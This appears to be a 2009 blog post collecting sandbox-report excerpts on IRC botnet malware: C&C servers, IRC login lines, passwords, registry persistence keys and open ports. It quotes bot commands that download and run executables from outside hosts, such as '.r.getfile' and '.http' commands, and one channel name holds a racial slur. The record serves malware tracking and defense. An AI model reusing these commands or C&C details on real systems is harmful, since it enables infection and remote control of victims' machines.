Month: October 2009

Secret.Virus.Gov (ogard from unkn0wn.ws 23k net dci bot)

Remote Host / Port Number
174.143.212.148 6667
66.45.237.212 80

* The data identified by the following URL was then requested from the remote web server:
  o http://accf0ur.t35.com/03.jpeg

NICK VirUs-oqgsnaxa
USER VirUs "" "mqo" :8Coded8VirUs..
JOIN #OgarD3# Virus
PRIVMSG #OgarD3# :Success.
PASS Virus

Registry Modifications
* The following Registry Key was created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67KLN5J0-4OPM-61WE-AAX2-5657QWE232788}
* The newly created Registry Value

61.139.151.20

Remote Host / Port Number
61.139.151.20 6697

MODE MetroP-XP820
JOIN #putas
PONG bitches.teibol.com
NICK MetroP-XP820
USER USA63600 * 0 :COMPUTERNAME
PASS msnfuck

Other details
* The following port was open in the system:
  Port / Protocol / Process
  1052 TCP iexplore.exe (%System%\iexplore.exe)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Internet Explorer = "iexplore.exe"
  so that iexplore.exe runs every

sip4.voipkosovasite.com

Unknown Connections
  Host By Name:
    Requested Host: home-off-d5f0ac
    Resulting Address: 172.16.2.61
    Requested Host: sip4.voipkosovasite.com
    Resulting Address: 82.114.87.46
  Connection Established: 0
  Socket: 0
Outgoing Connections
IRC Data
  User Name: XP-5101
  Host Name: *
  Server Name:
  Real Name: HOME-OFF-D5F0AC
  Nick Name: [00|USA|169352]
  Non RFC Conform: 1
  Channel Name: #!a!
  Topic Deleted: :.msn.stop|.msn.msg foto? http://xhena.xh.ohost.de/viewimage.php?=
  Private Message Deleted
    Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.login mamajokero -s
    Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.r.getfile http://82.114.87.46/set.jpg c:/sd.exe 1 -s
  Notice Message Deleted
    Value: :irc.priv8net.com NOTICE

92.241.164.197

Remote Host / Port Number
92.241.164.197 8877

NICK ENGLISH|COMPUTERNAME|241
NICK ENGLISH|COMPUTERNAME|162
USER ENGLISH|COMPUTERNAME|162 0 * :Hoooooly 67893
PONG 781430258
JOIN #free
USER ENGLISH|COMPUTERNAME|241 0 * :Hoooooly 88723
PONG 653356001
PING primax.besecure.biz

Other details
The following ports were open in the system:
  Port / Protocol / Process
  1052 TCP reg32.exe (%System%\reg32.exe)
  1053 TCP reg32.exe (%System%\reg32.exe)
  1054 TCP reg32.exe (%System%\reg32.exe)

Registry Modifications
The following Registry Keys were created:
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SECULAY
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SECULAY\000
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SECULAY\000\Control
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SecuLay
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SecuLay\Security
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SecuLay\Enum
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SECULAY
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SECULAY\000
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SECULAY\000\Control
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuLay
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuLay\Security
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuLay\Enum
The newly created Registry Values

login.ipwhois.org.uk (very big botnet)

5.c) windows7addon.exe

- Network Activity
  - DNS Queries:
    Name / Query Type / Query Result / Successful / Protocol
    login.ipwhois.org.uk DNS_TYPE_A 111.68.19.104 1
    login.ipwhois.co.uk DNS_TYPE_A 111.68.19.104 1
    www.pr0.net DNS_TYPE_A 64.59.116.150 1
  - IRC Conversations:
    111.68.19.104:47221
    Nick: [00_AUT_XP_1270214]
    Username: SP3-601
    Joined Channel: #russi
    Channel Topic for Channel #russi: ".asc -S -s|.http http://privcash.cc/10.exe|.asc exp_all 15 5 0 -a -r -e -s|.asc exp_all 20 5

srv1.manage-your-box.ru (baadshaah lamer big net)

DNS Lookup
  Host Name / IP Address
  srv1.manage-your-box.ru 216.246.77.66
  rapidshare.com 195.122.131.4
  rs716tg.rapidshare.com 80.231.31.117

Download URLs
  http://195.122.131.4/files/298437914/81 (rapidshare.com)
  http://80.231.31.117/files/298437914/81 (rs716tg.rapidshare.com)

* C&C Server: 216.246.77.66:1863
* Server Password:
* Username: SPX
* Nickname: N|DEU|0|XP|092652263
* Channel: #mix# (Password: ####)
* Channeltopic: :8FEB48668E75185DB32D7D0B65D097F592B1C267FE416DF5E91C4DF84E6F6944306D807B4E8C1F5699261CC7FBCCD9D24E6CFF98134A2134D08B47A87849D7FC0C7B

Outgoing connection to remote server: rapidshare.com TCP port 80
Outgoing connection to remote server: rs716tg.rapidshare.com TCP port 80

DNS Lookup
  Host Name / IP Address
  dell-d3e62f7e26

irc.ie.hotgate.eu

Remote Host / Port Number
79.125.12.23 6667

NICK |POP|942165|1|en-US|
USER |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US|
JOIN #archer nigger
PING :archer.no-ip.org

Invisible Users: 489
Operators: 13 operator(s) online
Channels: 38 channels formed
Clients: I have 509 clients and 1 servers
Local users: Current Local Users: 509 Max: 673
Global users: Current Global Users: 520 Max: 682

File System Modifications
* The following files were created in the

DUBAI.ladroes.gov

Invisible Users: 52
Operators: 1 operator(s) online
Channels: 4 channels formed
Clients: I have 53 clients and 0 servers
Local users: Current Local Users: 53 Max: 104
Global users: Current Global Users: 53 Max: 88

189.74.8.98 :6667, channels #win, #system

ns2.mm1-shop.net

# Winsock Section
* Unknown Connections
  o Host By Name:
    + Requested Host: ns2.mm1-shop.net
    + Resulting Address: 46.3.96.231
  o Connection Established: 0
  o Socket: 0
* UDP connections_listening
  o Transport Protocol: TCP
  o Local Port: 47154
  o Connection Established: 0
  o Socket: 1296
* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 87.118.112.244
  o

88.255.120.47

Remote Host / Port Number
88.255.120.47 6667

NICK aynur|Cam
USER Bahar11 "Cod" "timu.gadarlar.net" :aLeyna
NICK kontroL
USER aynur1 "Cod" "timu.gadarlar.net" :melek
USERHOST aynur|Cam
MODE #Security#
JOIN #!! birtanem
MODE aynur|Cam +i
MODE #!
PRIVMSG #!! :ben geldim
NICK Aysun883

* The following ports were open in the system:
  Port / Protocol / Process
  113 TCP caves.exe (%System%\caves.exe)
  1052 TCP caves.exe (%System%\caves.exe)
  1053 TCP caves.exe (%System%\caves.exe)
  1054 TCP caves.exe (%System%\caves.exe)

Registry Modifications
* The